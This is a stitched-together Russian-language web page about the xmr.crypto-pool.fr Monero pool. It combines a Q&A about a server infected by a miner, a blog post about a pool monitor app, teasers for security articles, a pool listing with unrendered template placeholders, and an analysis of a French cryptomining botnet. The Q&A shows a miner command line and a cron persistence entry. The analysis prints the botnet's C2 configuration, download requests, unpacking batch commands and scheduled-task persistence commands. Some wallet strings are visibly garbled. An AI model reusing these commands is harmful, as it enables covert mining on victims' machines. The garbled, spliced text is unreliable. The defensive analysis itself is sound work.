Xmr crypto pool fr: Yet Another Crypto Mining Botnet?

Содержание

удалить xmr.crypto-pool.fr процесс ubuntu — CodeRoad



на моем сервере Ubuntu был запущен анонимный процесс, который использует память 100%.

Пользователь: Tomcat

процесс : /tmp/autox -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX -p x

Я продолжаю пытаться убить процесс и файл, который я нашел в папке /tmp, но все же он воссоздает файл с другим именем и запускает процесс обратно.

я сбрасываю INPUT & OUTPUT для xmr.crypto-pool.fr в IPTABLES

теперь он был раздражающим на сервере.

Ребята, пожалуйста, помогите !

security server ubuntu-14.04 malware
Поделиться Источник Aziz Shaikh     12 июля 2017 в 11:40

2 ответа


  • Удалить cassandra из ubuntu

    Я хочу удалить cassandra из моего PC (ubuntu 14.

    04). Я выполняю эту команду. sudo apt-get удалить cassandra Я получил эту ошибку : — > имя пользователя отсутствует в файле sudoers. Об этом инциденте будет сообщено. Пожалуйста, помогите мне удалить cassandra.

  • ubuntu terminal проверьте, запущен ли процесс

    Мне нужно проверить в ubuntu terminal, если процесс node запущен, чтобы я мог использовать две разные команды, а затем, если он запущен или нет. я пытаюсь скопировать и вставить этот код в ubuntu terminal: if pgrep -x node > /dev/null then echo Running else echo Stopped fi в terminal я получаю…



0

Я только сегодня понял, что мой сервер тоже был заражен. Процесс для меня был не /tmp/autox, а экземпляром ./http.conf (не ./ в начале). Когда я смотрел на старух, я нашел эту:

* * * * * /tmp/.-/update >/dev/null 2>&1

Затем я удалил строку из своих crons и перешел на /tmp/. -/ , где действительно находится вредоносная программа. В качестве временного исправления я добавил оператор exit в верхней части каждого скрипта, найденного в этой папке. Я пока не хочу его удалять, так как хочу исследовать немного больше. Я также удалил все ключи, добавленные в

.ssh/authorized_keys . Теперь, убивая процесс, он не запускается снова.

Я обновлю свой ответ, если найду что-нибудь еще.

Поделиться Viandoks     15 июля 2017 в 08:30


Поделиться Sravan     14 июля 2017 в 05:56


Похожие вопросы:


Удалить папки Ubuntu

Когда я пытаюсь удалить папку с именем TerrariaServer в Ubuntu 14.04 с помощью rm TerrariaServer, но это не работает, говоря, что rm: не может удалить ‘TerrariaServer’: это каталог. Извините,…


Как убить процесс MySqlWorkBench в Ubuntu?

Я установил Mysql Workbench на свою машину (ubuntu 14. 04 LTS) В последнее время это программное обеспечение висит очень много. Я хочу убить процесс Я выполнил команду ПС вспомогательный но я не могу…


Как удалить ubuntu form windows или вручную

Я установил ubuntu 14.0 поверх моего windows, а теперь хочу удалить ubuntu. Но когда я пытаюсь удалить его с панели управления, то не могу понять ubuntu icon…can u пожалуйста, помогите мне?…


Удалить cassandra из ubuntu

Я хочу удалить cassandra из моего PC (ubuntu 14.04). Я выполняю эту команду. sudo apt-get удалить cassandra Я получил эту ошибку : — > имя пользователя отсутствует в файле sudoers. Об этом инциденте…


ubuntu terminal проверьте, запущен ли процесс

Мне нужно проверить в ubuntu terminal, если процесс node запущен, чтобы я мог использовать две разные команды, а затем, если он запущен или нет. я пытаюсь скопировать и вставить этот код в ubuntu…


Удалить Flink on Ubuntu

ubuntu новичок здесь.

Несколько дней назад я установил Flink версии 1.3.1 на кластер ubuntu. Мне абсолютно нужна последняя версия 1.3.2, но я не нахожу никакой процедуры в google, чтобы безопасно…


Как удалить рабочий процесс

Есть ли способ полностью удалить рабочий процесс из приложения, когда записи все еще ‘in process’? Я пытался инактивировать рабочий процесс, но, конечно, он не позволит этого, пока есть записи ‘in’…


Как удалить flutter на ubuntu?

Я хотел бы удалить/удалить flutter на ubuntu (16.04). Я не нашел никакого решения в Интернете. Большое спасибо!


Удалить chromedriver из Ubuntu

Я хочу обновить версию chromedriver, которую я установил, следуя этой инструкции https://christopher.su/2015/selenium-chromedriver-ubuntu / Для этого я хочу удалить текущую версию. Я попытался…


как форсировать процесс убийства в Ubuntu году?

я пытаюсь убить процесс, работающий в фоновом режиме платформы Ubuntu, используя sudo kill<process_number> до этого я использовал sudo lsof -t -i:<port_number> , чтобы точно знать номер. ..

Мониторинг Monero-пула crypto-pool.fr — EA DROS’s BLOG

Написал тут маленькую мониторилку статистики с пула monero.crypto-pool.fr . Так, для души.

Вводная

На фоне общей истерии с криптовалютам ближе к концу 2017 года, решил тоже посмотреть, что нынче и почем. Про биткоин слышал еще в далеком 2012 году и даже намайнил тогда, на уже стареньком, Radeon HD4850 пол монетки, которые в последствии благополучно просрал. Стоил бит тогда что-то около 30-40 долларов и на потерю половины этой суммы было вообще фиолетово.

С тех пор прошло ощутимое количество времени. Дикий рост биткоина в конце прошлого года заставил «вспомнить молодость» и я полез смотреть что там есть из валют, которые можно майнить на моих семерках (Core i7). Размавлять долго не буду — выбор пал на Monero.

Сначала я майнил на дварфе, но его периодические отвалы стали дико напрягать. Не смотря на то, что операторы пула сообщали, мол, сайт в дауне, но стата работает и все считает правильно, не ссыте в тапки — правдивостью не отличались. Пару раз она ни хрена не зачла майнинг за целый день. Так я переполз на crypto-pool.

Всегда приятно смотреть на статистику начисляемых денежных средств. Но делать это через родной сайт — коряво и не спортивно. И тут я решил запилить мониторилку этой самой статы в виде маленькой программки, работающей откуда угодно и не требующей установки.

В первую очередь интересовали такие данные:

— когда пул последний раз видел майнера

— каков текущий баланс на кошельке

— сколько еще нужно намайнить до следующей автовыплаты средств

Раз уж я тут как-то упоминал PureBasic и обещал на нем что-нить зарелизить в той статье — его и взял в качестве средства разработки.

Про мониторилку

В главном и единственном окне программы выводятся:

— время последней найденной шары, по которому можно судить о том, что майнер в онлайне

— средний хешрэйт по всем майнерам, завязанных на данный адрес кошелька

— процентная диаграмма, показывающая сколько еще нужно накопать для следующей автоматической выплаты пулом намайненых средств на кошелек

— текущий баланс

Минимализм единственного окна программы мониторинга

В верхней части, слева и справа от времени последней шары, расположены иконки «меню» (слева) и «ручного обновления» (справа). Вообще, программа сама, через заданный промежуток времени, запрашивает статистику пула, но можно это сделать принудительно, кликнув на правую иконку. Во время процесса обновления, иконка начинает вращаться до тех пор, пока не будут получены данные от пула. После этого она возвращается к прежнему виду.

Меню представляет собой следующую структуру:

Вид меню при клике на иконку слева сверху

— «CP:Monitor 0.1» — Название и версия программы.

— «Always on top» — не что иное, как отображение окна поверх остальных. Можно включить эту опцию или выключить.

— «Settings» — основные настройки монитора:

— «Start minimized» — запуск в свернутом виде

— «Remove from taskbar» — убрать монитор из панели задач (будет отображаться только иконка в трее)

— «New address» — позволяет сменить адрес кошелька, за которым следим

— «Refresh period» — периодичность в секундах, с которой монитор будет запрашивать статистику пула в автоматическом режиме. Допустимые значения от 20 секунд (чтоб за более частые запросы пул нас не забанил например) и до 600 (т. е. 10 минут). По дефолту установлено значение в 60 секунд.

— «Dead time detect» — время в минутах, по факту превышения которого, цвет времени последней добытой шары на самом верху окна сменяется на красный, а во всплывающей подсказке, при наведении на него мышкой, выводится время и дата, когда последняя шара была получена пулом. По этой информации можно отслеживать результативность майнинга и как следствие — в онлайне майнер(ы) или нет. Минимальный порог равен 1 минуте, максимальный не ограничен. По дефолту стоит 5 минут.

— «Exit» — тут все понятно

Вот, собственно, и все настройки.

Изменение периода автоматического обновления статистикиПорог времени, по достижении которого считается, что майнер оффлайн

В перспективе был вариант добавить к «Dead time detect» возможность запуска сторонней программы по факту наступления этого события, но меня заломало, да и привязка к стороннему софту делает программу не совсем портабельной. Если кому-то это понадобится, скажите, добавлю. Еще была мысль сделать пристыковку к краям экрана, как это реализовано в том же WinAmp-е, но причина отсутствия такой возможности — та же лень.

Вообще, пишите в комментарии что хочется, попробуем это реализовать, если позволит информация, выдаваемая пулом конечно же.

Особенности работы

При первом запуске монитора, Вы увидите запрос на ввод отслеживаемого адреса. Пока поддерживаются только адреса 95-ти байтной длины, 106-ти байтные пролетают. Но этот вопрос так же в работе. Так вот, если адрес не валидный, монитор сообщит об этом и попросит ввести адрес по новой. Так будет продолжаться до тех пор, пока: а) не будет введен правильный 95-ти байтный адрес кошелька; б) будет оставлена пустая строка и нажат кнопка «Ок». Во втором случае программа завершит свою работу.

Если адрес введен верный, будет предпринята попытка получения статистики по нему с пула. Но если на пуле этот адрес не найден — Вы вновь увидите окно ввода нового номера кошелька. Алгоритм тот же.

Запрос на ввод адресаВведенный адрес не найден на пулеВведенн пустой адрес. После нажатия «Ok» программа закроется.

Если Вы только-только запустили майнинг на этот пул, то какое-то время стата по нему вообще не отображается, на что пул, собственно, и выдает — адрес не найден. Подождите какое-то время и попробуйте еще раз. После того, как появится первая стата — все будет тип-топ.

Иногда, пул считает, что в текущий момент никто ничего не майнит (например майнер работает на своего автора, и майнит какое-то время на его пул — так сказать вознаграждение за бесплатный софт) — в этом случае в строке хешрэйта отображаются прочерки. Это нормально. Сам пул в это время показывает хешрэйт равный нулю. Зайдите и проверьте как-нить.

Если время последней шары старше текущего минус порог, заданный опцией «Dead time detect», то это время отображается красным цветом, а по наведению машки на него — появляется всплывающая подсказка с датой и временем последней найденной шары.

Вот наглядный пример двух прошлых абзатцев

Ну вот наверно и все, что касается описания работы с монитором.

Кое-что еще

Для того, чтобы понимать, насколько популярна или же наоборот данная программа, я засунул в нее сбор статистики по ее запуску. Во время старта программы, происходит запрос на домен soft.dros.ws и туда улетает информация об имени программы и ее версии. Выглядит это как MD5-хеш ( md5(title + version) — можете проверить по данным, указаным ниже). Больше ничего никуда не валится, не бекдорится, них**. Если все равно ссыкотно, можно добавить хост а блэклист.

Поэтому я сразу предупреждаю об этой особенности данного ПО.

Скачать программу мониторинга Monero Crypto-Pool без смс

Пока есть только сборка под Windows x86/x64, потому как Мак-аки у меня нет, а под *nix я ее не компилировал, хотя обязано работать без переделок.

Имя: CP:Monitor

Версия: 0.1

Размер: 445952 байта

Ссылка на скачивание: cpmonitor.zip

Хеш-суммы программы:

MD5: 9b6f676cf3201f53adcd0cd3a0c52412

SHA-256: 907e4f31b23f18a3af59503157124d5b7943438b8fc37583bafcea9cf0850f96

Для тех, у кого белая горячка паранойя терминальной стадии — вот ссылка на VirusTotal с результатами продувки.

Если выше приведенные хеши не совпадают — сотрите к чертовой матери имеющийся у вас монитор и проверьте систему антивирем. Я гарантирую безопасную работу только той версии, которая представлена здесь. Если вы слили мониторилку с какого-то левого сайта, с совершенно другими хешами — то все претензии в тем ребятам, которые ее туда выложили. Я белый и пушистый.

PS

Пишите что нравится/не нравится, а так же — что пришить и что отрезать в будущих релизах в комментарии.

За сим решите откланяться, всем низких сложностей, высоких хешрейтов и космических курсов.

DC7495



Дата публикации: 2020-10-10
Теги: buffer overflow, heap overflow, windows

Источник: https://www.fuzzysecurity.com/tutorials/mr_me/6.html
Перевод: Анонимный переводчик

Ранее мы рассмотрели различные техники обхода механизмов защиты Windows при переполнении кучи. Сегодня же у меня для вас сюрприз. Сегодня мы познакомимся не с очередной техникой атаки переполнением, а узнаем, как использовать уязвимость типа “двойное освобождение” при переполнении.
Многие скажут вам, что двойное освобождение трудно эксплуатировать, но я вас уверяю: зачастую эксплуатация этого бага легче, чем обычное переполнение кучи. Мне всегда было любопытно, как можно эксплуатировать эти уязвимости, ведь нередко такие уязвимости обозначены как критические.
(далее…)



Дата публикации: 2020-09-12
Теги: buffer overflow, heap overflow, windows

Источник: https://www.fuzzysecurity.com/tutorials/mr_me/5.html
Перевод: анонимный переводчик, редакция: @N3M351DA

Привет, ребята!
И снова я с вами, чтобы рассказать об очередной технике эксплуатации кучи, которую не хотелось бы видеть погребённой в песках времени. Мне повезло, и у меня есть немного свободного времени в эти новогодние каникулы. Его то я и использую, чтобы рассказать вам об этой технике. Для начала освежим в памяти уже пройденные материалы:
(далее…)



Дата публикации: 2020-08-31
Теги: malware, reverse

Источник: https://medium. com/@aroralakshay2014/unpacking-malware-like-a-pro-85cd00c870e9
Переводчик: @WeakLeakPeak [Писать сюда по косякам в тексте]
Редактор: @N3M351DA
[в этих скобках примечание переводчика]

Создатели вредоносного ПО используют множество техник для обхода антивирусов. Самая распространённая из них – это упаковывание: эта техника позволяет сжать или зашифровать вредоносный код. Вместо него в операционную систему загружается код распаковщика, который несет в себе сжатую/зашифрованную нагрузку. После её распаковки код передаёт управление вредоносному ПО.

(далее…)



Дата публикации: 2020-06-07
Автор: Перевод: @N3M351DA
Теги: IMSI

Источник: https://www.eff.org/wp/gotta-catch-em-all-understanding-how-imsi-catchers-exploit-cell-networks

1 Введение

Вы, наверное, слышали о Stingrays или IMSI-catcher’ах, которые относятся к широкой категории CSS – Cell Sites Simulators (поддельных базовых станций – ред. ) – устройств, которые маскируются под легитимные базовые станции сотовой связи, заставляя телефоны в пределах определенного радиуса подключиться к себе, а не к оборудованию оператора. Эти устройства позволяют своим операторам «шпионить» за использованием мобильных телефонов людьми поблизости. Существует много неопределенностей в отношении того, на что действительно способны CSS, и разные социальные группы – от активистов до политиков и технологов интерпретируют их возможности по-разному.

(далее…)



Дата публикации: 2020-06-02
Автор: Перевод: @ZzzNein
Теги: vpn

Статья: Дэвид Флетчер 23 марта 2020 г. (https://www.blackhillsinfosec.com/check-your-perimeter/)

Сейчас, когда многие организации переходят на удаленную работу в связи с COVID-19, хотелось бы коснуться некоторых элементов конфигурации, которые следует учитывать при обеспечении должной безопасности сетевого периметра. Удаленный доступ сотрудников часто привлекает злоумышленников, которые пытаются получить доступ к внутренней сети организации. С авторизованным удалённым доступом нарушитель может в короткие сроки получить информацию о ней.

(далее…)



Дата публикации: 2020-05-21
Автор: Перевод: @N3M351D4
Теги: iot, wi-fi

Источник: https://blog.compass-security.com/2017/04/iot-wifi-module-dump-the-data/  

 

WiFi-модуль ESP8266 от ESPRESSIF — это популярный недорогой (дешевле 2 долларов США) WiFi-модуль, который устанавливают на печатные платы. Он часто используется для проектов IoT и легко программируется с помощью Arduino IDE или Mongoose OS и его IDE через Интернет. Модули ESP8266 закрыты металлическим экраном. Под экраном находится микросхема WiFi/CPU и микросхема FLASH памяти с последовательным интерфейсом SPI.

(далее…)



Дата публикации: 2020-05-19
Автор: @brom_samedi
Теги: jwt, web

Гри-гри — талисман вуду

или амулет для защиты

владельца от зла или на счастье.

(далее…)



Дата публикации: 2020-05-16
Автор: Перевод: @ZzzNein
Теги: android

Источник: https://resources.infosecinstitute.com/android-forensics-cracking-the-pattern-lock-protection/

Введение

В данной работе показано как разгадать графический ключ пользователя устройства на базе Android. Данный способ предположительно работает только на телефонах с рут-правами. Статья основана на задаче, которая решалась в ходе онлайн CTF (Capture the Flag – захват флага, соревнования по компьютерной безопасности).

(далее…)

Monero Crypto Pool XMR Mining Pool — обзоры и особенности

Monero Crypto Pool XMR Mining Pool — обзоры и особенности | CryptoCompare.com

CryptoCompare требует включения JavaScript для работы.

Следуйте этим инструкциям, чтобы активировать и включить JavaScript в Chrome .

ПК

  1. Справа от адресной строки щелкните значок с 3 горизонтальными линиями, расположенными друг над другом .
  2. В раскрывающемся меню выберите Настройки .
  3. Внизу страницы щелкните ссылку Показать дополнительные настройки… .
  4. В разделе Privacy нажмите кнопку Content settings… .
  5. Под заголовком JavaScript выберите
    Разрешить всем сайтам запускать JavaScript
    .
  6. Наконец, обновите свой браузер.

MAC

  1. Выберите Chrome на панели Apple / System в верхней части экрана.
  2. Выберите Preferences … из раскрывающегося меню.
  3. В левом столбце выберите Настройки из списка.
  4. Внизу страницы щелкните ссылку Показать дополнительные настройки… .
  5. В разделе Privacy нажмите кнопку Content settings… .
  6. Под заголовком JavaScript выберите Разрешить всем сайтам запускать JavaScript .
  7. Наконец, обновите свой браузер.

Вы уже просмотрели {{pageInfo.geth2Text ()}}. Спасибо, что поделились с остальным сообществом!

У вас был хороший или плохой опыт?

  • снимал ваши биткойны или наличные с сайта {{pageInfo.geth2Text ()}} легко
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • — это простой в использовании веб-сайт {{pageInfo.geth2Text ()}}.
  • торговался ликвидно и безопасно на {{pageInfo.geth2Text ()}}

У вас был хороший или плохой опыт?

  • было {{pageInfo.geth2Text ()}} оборудованием, доставленным вовремя.
  • сотрудников службы поддержки были своевременными и полезными
  • были простыми и понятными инструкциями по настройке для {{pageInfo. geth2Text ()}}
  • : {{pageInfo.geth2Text ()}} работает должным образом.

У вас был хороший или плохой опыт?

  • выполнил оборудование / контрактные работы, как ожидалось
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • — это простой в использовании веб-сайт {{pageInfo.geth2Text ()}}.
  • — это простой {{pageInfo.geth2Text ()}} процесс оформления заказа и оформления заказа.

У вас был хороший или плохой опыт?

  • получили ли вы ожидаемую прибыль от {{pageInfo.geth2Text ()}}
  • сотрудников службы поддержки были своевременными и полезными
  • был веб-сайтом, простым в использовании
  • было четким и понятным описанием {{pageInfo.geth2Text ()}}

У вас был хороший или плохой опыт?

  • был {{pageInfo.geth2Text ()}} простым в использовании
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • были ли у вас проблемы с {{pageInfo.geth2Text ()}} безопасность
  • имел ли веб-сайт / приложение {{pageInfo.geth2Text ()}} все необходимые функции?

У вас был хороший или плохой опыт?

  • был {{pageInfo.geth2Text ()}} простым в использовании
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • были ли у вас проблемы с {{pageInfo.geth2Text ()}} в банкоматах или в POS
  • выполнил {{pageInfo.geth2Text ()}} веб-сайт / приложение карты имеют все необходимые функции

У вас был хороший или плохой опыт?

  • был {{pageInfo.geth2Text ()}} простым в использовании
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • был когда-либо {{pageInfo.geth2Text ()}} из-за вас
  • заплатил ли {{pageInfo.geth2Text ()}} когда-либо меньше, чем ожидалось
  • выполнил {{pageInfo.geth2Text ()}} веб-сайт / приложение имеют все необходимые функции

У вас был хороший или плохой опыт?

  • действительно {{pageInfo.geth2Text ()}} справился с вашим довольно
  • заплатил ли {{pageInfo.geth2Text ()}} когда-либо меньше, чем ожидалось
  • было {{pageInfo.geth2Text ()}} простым в использовании
  • были своевременными и полезными сотрудниками службы поддержки {{pageInfo.geth2Text ()}}.
  • было {{pageInfo.geth2Text ()}} когда-либо для вас
  • имел ли веб-сайт / приложение {{pageInfo.geth2Text ()}} все необходимые функции?

Загрузка последних отзывов Загрузка дополнительных отзывов

  • Расположение серверов Европа

  • Средняя комиссия 2%

Monero Crypto Pool — это французский майнинг-пул, который позволяет пользователям майнить XMR за 2% комиссии и через платежную систему Prop.Пожертвовано 10% комиссии.

Сервер для Monero Crypto Pool:

  • stratum + tcp: //xmr.crypto-pool.fr: 3333 (порт Stratum CPU2 — хешрейт <300H / sec)
  • stratum + tcp: //xmr.crypto-pool.fr: 9999 (порт Stratum RIG3 — хешрейт> 1 кГц / сек)
  • stratum + tcp: //xmr.crypto-pool.fr: 8888 (порт Stratum RIG2 — хешрейт <1KH / Sec)
  • stratum + tcp: //xmr.crypto-pool.fr: 8443 (Уровень порта SSL)
Минимальная выплата для майнингового пула

0,3 XMR

{{элемент.Рейтинг [‘TotalUsers’]}} {{getNumberOfPeopleText ()}}

У этого {{contenttitle}} еще нет отзывов. Если вы использовали его, поделитесь своим мнением с другими.

Этот веб-сайт предназначен только для вашей общей информации и не предназначен для использования вами при создании каких-либо инвестиционные решения. Вы всегда должны комбинировать несколько источников информации и анализа, прежде чем делать инвестировать и обратиться за консультацией к независимому эксперту по финансовым вопросам.

Когда мы перечисляем или описываем различные продукты и услуги, мы стараемся предоставить вам необходимую информацию, чтобы помочь вам. сравните их и выберите подходящий вам продукт или услугу. У нас также могут быть советы и дополнительная информация, которые помогут вам сравнить провайдеров.

Некоторые провайдеры платят нам за рекламу или рекламные акции на нашем веб-сайте или в электронных письмах, которые мы можем вам отправлять. Любое коммерческое соглашение, которое мы заключаем с поставщиком, не влияет на то, как мы описываем его или их продукты и услуги.Спонсируемые компании четко обозначены.

CryptoCompare требуется более новый браузер для работы.
Используйте один из указанных ниже браузеров:

49ers 21 века: малый майнинг криптовалюты

Подобно тому, как Калифорнийская золотая лихорадка привлекала любителей, соблазненных обещанием легких денег (оригинальные «49ers»), низкий барьер для входа соблазняет любителей заняться майнингом криптовалюты. К сожалению, эти старатели 21 века не всегда придерживаются законных методов: в январе 2017 года сообщалось [1] , что Sundown Exploit Kit удалял майнер криптовалюты на основе открытого исходного кода [2] .В то время было отмечено отсутствие «профессионального мастерства», очевидное в этой выборке, и было высказано предположение, что это является репрезентативным для тенденции к так называемым новичкам, участвующим в киберпреступности.

Февраль 2017 г. представляет собой аналогичную, возможно, более успешную кампанию, которая, по-видимому, затрагивает ряд машин во Франции, преимущественно связанных с МСП и системами местного самоуправления в регионе Верхний Рейн, в том числе:

  • Несколько сетей местного самоуправления;
  • Торговец садовой техникой;
  • Архитектурно-строительные фирмы;
  • A Автосалон подержанных автомобилей.

Вредоносное ПО

Проанализированный образец (SHA1: 05a02703a19d798415aa98212cf0f7242ba9b4da) представляет собой относительно ничем не примечательный PE-файл. После первоначального выполнения он подключается к своему основному серверу C2 для загрузки файла начальной конфигурации.

ПОЛУЧИТЬ /misc/configv36.ini HTTP / 1.1
Пользовательский агент: MyAgent
Хост: daterup1.ddns [.] Net
Кэш-контроль: без кеша 

Вредоносная программа, по всей видимости, использует строку «Пользователь-агент» MyAgent в своих сообщениях.

Сервер возвращает следующий не запутанный файл.Обратите внимание, что формат эффективно помещает данные в качестве «ключа» в многочисленные разделы, в отличие от более типичного стандарта файлов INI, состоящего из пар ключ = значение.

[VERSIONSERVEUR]
4,04
[NOMMAJ]
AdobeServiceUpdate.exe
[НОМЕР ОБНОВЛЕНИЯ]
IntelUpdate.exe
[НОМЕР]
java.exe
[NOMMINERGPU]
javaw2.exe
[CHEMINMAJ]
AdobeServiceUpdate
[CHEMINUPDATE]
IntelГрафика
[ХИМИНИСТРАТОР]
криптонот
[LISTESERVEURS]
списки
[ЗАГРУЗКА СЕРВЕРА]
hxxp: //www.goepper [.] fr / misc /
[СЕРВЕРТЕСТ]
hxxp: // daterup1.ddns [.] net / misc /
[SERVEURACTIVITE]
hxxp: //daterup1.ddns [.] net / misc /
[SERVEURSECOURS]
hxxp: // alurea [.] fr / misc /
[COMMANDE32 DWARF]
-dbg -1 -o stratum + tcp: //xmr-eu.dwarfpool [.] com: 8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4v4pmVRD2hUjAmWbwaVe4v4pmVRD2hUjAmWbwaVe4v4pmVRD2hUjAmWbwaVe4v4pmVRD2hUjAmWbwaVe4vUMpejtxa_data_datex_datex_data_data_gmail.
[COMMANDE64 DWARF]
-a cryptonight -o stratum + tcp: //xmr-eu.dwarfpool [.] com: 8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMiPretajtxData_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_Data_V_D_0_0_0_0_0_02] com -t
[COMMANDE32 MINERGATE]
-dbg -1 -o stratum + tcp: //xdn-xmr.pool.minergate.com: 45790 -u daterup @ gmx [.] com -p x -t
[COMMANDE64 MINERGATE]
-a cryptonight -o stratum + tcp: //xdn-xmr.pool.minergate [.] com: 45790 -u daterup @ gmx [.] com -p x -t
[COMMANDE32 CRYPTO]
-dbg -1 -o stratum + tcp: //xmr.crypto-pool [.] fr: 3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMVRD2hUjAmWbwaVe4vUMveKApDX-X5KX-5VMVMVPMXTXTG-X5
[COMMANDE64 CRYPTO]
-a cryptonight -o stratum + tcp: //xmr.crypto-pool [.] fr: 3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMVRD2hUjAmWbwaVe4vUMveKApDx-x5-xx-5VMVPMVPMXTDX-X5
[КОМАНДА32]
-dbg -1 -o stratum + tcp: // fcn-xmr.pool.minergate [.] com: 45590 -u daterup @ gmx [.] com -p x -t
[КОМАНДА64]
-a cryptonight -o stratum + tcp: //fcn-xmr.pool.minergate [.] com: 45590 -u daterup @ gmx [.] com -p x -t
[COMMANDE64YAM]
-c 1 -M stratum + tcp: //daterup%40gmx.com: [email protected] [.] com: 45590 / fcn -t
[КОМАНДЕГПУ]
javaw2.exe -o stratum + tcp: //fcn-xmr.pool.minergate [.] com: 45590 -u daterup @ gmx [.] com -p x
[РАФРАИЧМИН]
1800
[RAFRAICHMAX]
3600
[СКАЧАТЬ]
shortcut.lnk
[УДАЛЯТЬ]
version.old 

Затем вредоносная программа немедленно пытается запросить инструкции с сервера:

GET / misc / worker / commandes / <32/64> - <ДОМЕН> - <ПОЛЬЗОВАТЕЛЬ> - <ИМЯ МАШИНЫ> HTTP / 1.1
Пользовательский агент: MyAgent
Хост: daterup1.ddns [.] Net
Кэш-контроль: без кеша 

В случае нашей песочницы это привело к ошибке 404 — вероятно, из-за того, что машина ранее не была заражена. В ответ на это вредоносная программа загружает два файла с предопределенного сервера загрузки ( [SERVEURDOWNLOAD] в файле конфигурации):

  • shortcut.lnk
  • filelist36.ini

Содержимое файла filelist36.ini имеет формат, аналогичный формату содержимого configv36.ini и показаны ниже. Обратите внимание, что имена разделов, используемые в файле filelist36.ini , по-видимому, были написаны на английском, а не на французском языке.

[ARCHIVEMINER32]
archClaymore32.zip
[ARCHIVEMINER64]
archCryptonote64.zip
[ARCHIVEMAJ32]
maj32.36.zip
[ARCHIVEMAJ64]
maj64.36.zip
[ОБНОВЛЕНИЕ АРХИВА]
update.36.zip
[7ZA.EXE]
7za.exe
[7ZA.DLL]
7za.dll
[7ZXA.DLL]
7zxa.dll 

Содержимое shortcut.lnk потенциально более интересно, и причина его включения в загруженные файлы неясна, хотя, как показано ниже, вредоносная программа имитирует имя процесса IntelUpdate.Файл выглядит правильно отформатированным .lnk-файлом и включает ссылки на каталог / файл C: \ Users \ Alex \ AppData \ Roaming \ IntelGraphics \ IntelUpdate.exe и имя компьютера alex-hp .

Если 7zip отсутствует на зараженной машине, вредоносная программа загружает установочные файлы 7zip, записанные в filelist36.ini , затем загружает обновление .36.zip и распаковывает его, используя версию 7zip для командной строки.

Обратите внимание, что пароль, используемый для файла, буквально «{pass}».

тайм-аут 2
cd "% APPDATA% \ 7z"
7za e -p {pass} -y -w ["% APPDATA% \ cryptonote"] "% APPDATA% \ update.36.zip" -o "% APPDATA%"
del C: \ Documents and Settings \ user \ Desktop \ french.exe
переместите "% APPDATA% \ update.exe" C: \ Documents and Settings \ user \ Desktop \ french.exe
тайм-аут 2
"C: \ Documents and Settings \ user \ Desktop \ french.exe"
del "% APPDATA% \ uscript_auto_maj.bat" 

Затем вредоносная программа снова связывается с исходным C2 по адресу / misc / worker / allowupdate / <32/64> — , предположительно, чтобы проверить, следует ли продолжить установку обновления, перед удалением предыдущие версии самого себя и настройка новой версии как нового запланированного задания:

schtasks / Delete / tn «Microsoft Schelude Update» / F
schtasks / Delete / tn «Microsoft Schelude Updater» / F
schtasks / Delete / tn "Intel Service Update" / F
schtasks / Delete / tn «Обновление Adobe Reader» / F
schtasks / Delete / tn "update" / F
schtasks / Удалить / tn «Adobe Reader Updater» / F
schtasks / create / sc MINUTE / MO 120 / tn "Intel Service Update" / tr "C: \ Documents and Settings \ user \ Application Data \ IntelGraphics \ IntelUpdate.exe "/ F / RL HIGHEST
schtasks / create / sc MINUTE / MO 10 / tn "Adobe Reader Update" / tr "C: \ Documents and Settings \ user \ Application Data \ AdobeServiceUpdate \ AdobeServiceUpdate.exe" / F / RL HIGHEST
del "C: \ Documents and Settings \ user \ Application Data \ tskschl.bat" / F 

После запуска вредоносная программа снова запрашивает дополнительные команды / misc / worker / commandes / <32/64> — .

Серверы C2

На момент написания daterup1.ddns [.] net преобразуется в IP-адрес 88.120.123.246, связанный с OVH во Франции. То, что кажется основным интерфейсом, находится в открытом каталоге и по запросу возвращает панель управления ботом (как показано ниже).

Среди рабочих мы также видим бота, работающего на машине с именем alex-hp , аналогично артефактам, обнаруженным в файле .lnk:

На этой странице также представлена ​​информация о времени безотказной работы и успешности текущей кампании, поскольку по состоянию на 20 февраля 2017 года машины обычно работают до пяти дней.Все эти адреса жертв связаны с французскими сетями / интернет-провайдерами и принадлежат множеству домашних пользователей, малых и средних предприятий и местных правительственных организаций.

Другая страница перечисляет ряд доступных команд для владельца ботнета, включая — по неясным причинам — очевидную возможность запуска Блокнота на зараженной машине:

Несколько дополнительных серверов C2 и / или загрузки были через команду listserveurs . Подробная информация о них приведена ниже, многие из которых, по-видимому, размещены на легитимных веб-сайтах.

Большинство этих серверов больше не используются, хотя в некоторых случаях они все еще отображают панель управления со списком неактивных рабочих при проверке, как показано на рисунке ниже.

Другой, ныне вышедший из употребления C2 (ниже) показывает данные о времени безотказной работы, которые предполагают, что кампания была активна в течение как минимум шести недель. Это, по-видимому, подтверждается датами, когда ряд исторических образцов был впервые записан, причем один образец датируется как минимум ноябрем 2016 года.

Ошибки новичка?

В примере с майнером, о котором сообщалось в январе, злоумышленник оставил в коде ссылки на свою личную учетную запись Github — ошибка, которая была его окончательной гибелью.

Актер, стоящий за этим примером, похоже, извлек урок из ошибок, описанных в предыдущей статье, и проявил хорошую «гигиену» в отношении Git и адресов электронной почты, связанных с учетными записями пользователей на веб-сайтах майнинга: адрес электронной почты daterup @ gmx [ .] com , похоже, был зарегистрирован исключительно для этой кампании.

